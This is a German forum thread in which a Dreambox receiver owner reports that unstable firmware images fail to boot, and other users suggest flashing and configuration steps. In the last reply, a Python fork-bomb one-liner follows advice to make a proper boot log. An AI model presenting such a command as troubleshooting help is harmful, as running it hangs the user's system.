Sammelthrad für unstable images DM8000/DM800/DM500HD

Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

  • Wie im 2.8.4 Thread geschrieben bootet meine Box nur mit dem reinem 2.8.4.. weder mit dem letzten unstable (2.5.) noch nach dem Online Update bootets durch: hab mir mal die Mühe gemacht ne bootlog zu machen, ist mit dem unstable:
    Hoffe das wird mit dem bald kommenden 3.0 nicht auftreten.
    Dateien
    • unstable.txt

      (4,24 kB, 525 mal heruntergeladen, zuletzt: )

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Obi-Stan ()

  • Das Teil ist zu 100% echt und jetzt ziemlich genau 2 Jahre alt. Hab keinen großen Plan was in der Log geschieht, aber das mit der Mac Adresse sieht echt ulkig aus. Wie mussn das sonst sein?
    Einfach noch mal in diesem Thread hier: keines der letzten Unstable will booten und auch das Online Update beim 2.8.4 gibt der Kiste die Kugel. Nur das reine 2.8.4 läuft super wie auch alle anderen Images davor. Wenn ich den Secondstage Loader 76 manuell reinhau gehts auch noch, aber die neuen dvb-Treiber sind dann auch wieder zu viel des guten.. Was mich halt nur wundert, dass ich scheinbar der einzige bin und es deswegen eigentlich an meiner Kiste liegen müsste.. 8o
  • Also ich bin direkt von 2.8.4 auf das unstable gegangen, ohne das ich 'nen anderen Loader genommen habe. Einfach das aktuelle Unstable genommen was es an dem Tag gab und genauso geflasht wie 2.8.4. Danach meine zuvor gesicherte Konfiguration drauf und fertig. Wobei ein paar Sachen nicht gingen aber das ist dann einfach außen vor geblieben.
    Geht deine Box denn, wenn du rein das Unstable flasht und dann mal alles neu machst, sprich Plugins etc. neu installierst anstatt auf alte Configs zuzugreifen???
  • Sie bootet nicht ein einziges Mal durch.. nur mit dem 2.8.4 und allen anderen davor.. die Sache mit dem Secondstage Loader war nur ein Test mal manuell von mir obs damit zusammenhängt.. ich habe keine Ahnung was da schief geht.. mehrfach flashen nützte auch nichts..
  • Original von Obi-Stan
    Wie im 2.8.4 Thread geschrieben bootet meine Box nur mit dem reinem 2.8.4.. weder mit dem letzten unstable (2.5.) noch nach dem Online Update bootets durch: hab mir mal die Mühe gemacht ne bootlog zu machen, ist mit dem unstable:
    Hoffe das wird mit dem bald kommenden 3.0 nicht auftreten.

    Mach erst mal nen richtigen bootlog aus dem man auch was lesen kann.
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !